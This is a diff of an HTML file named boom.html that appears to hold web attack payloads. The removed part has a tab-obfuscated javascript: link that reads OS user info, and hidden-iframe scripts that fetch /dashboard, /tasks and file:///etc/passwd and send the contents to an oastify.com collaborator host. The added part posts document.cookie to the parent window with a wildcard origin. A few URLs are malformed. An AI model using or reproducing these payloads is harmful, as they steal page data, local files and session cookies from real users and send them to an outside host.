--- a/boom.html
+++ b/boom.html
@@ -1,48 +1,3 @@
-<a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>123
-<iframe 
-  src="/dashboard" 
-  width="100%" 
-  height="600px" 
-  style="border:1px solid black;">
-</iframe> -->
-
-<!DOCTYPE html>
-<body>
-  <iframe src="/dashboard" style="display:none"></iframe>
-  <script>
-    // Attempt to read via fetch()
-    fetch('/dashboard')
-      .then(r => r.text())
-      .then(d => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/exfil', { method: 'POST', body: d }))
-      .catch(e => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.comm/error', { body: e.message }));
-
-    // Fallback to XHR
-    const xhr = new XMLHttpRequest();
-    xhr.open('GET', '/dashboard', true);
-    xhr.onload = () => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/xhr', { body: xhr.responseText });
-    xhr.send();
-  </script>
-</body>
-</html>
-
-<!DOCTYPE html>
-<body>
-  <iframe src="/tasks" style="display:none"></iframe>
-  <script>
-    // Attempt to read via fetch()
-    fetch('/tasks')
-      .then(r => r.text())
-      .then(d => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/exfil', { method: 'POST', body: d }))
-      .catch(e => fetch('https:/334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/error', { body: e.message }));
-
-    // Fallback to XHR
-    const xhr = new XMLHttpRequest();
-    xhr.open('GET', 'file:///etc/passwd', true);
-    xhr.onload = () => fetch('https://334b7k08a2q07qgnjriq73kplgr9f43t.oastify.com/xhr', { body: xhr.responseText });
-    xhr.send();
-  </script>
-</body>
-</html>
-
-
-
+<script>
+  parent.postMessage(document.cookie, '*');
+</script>
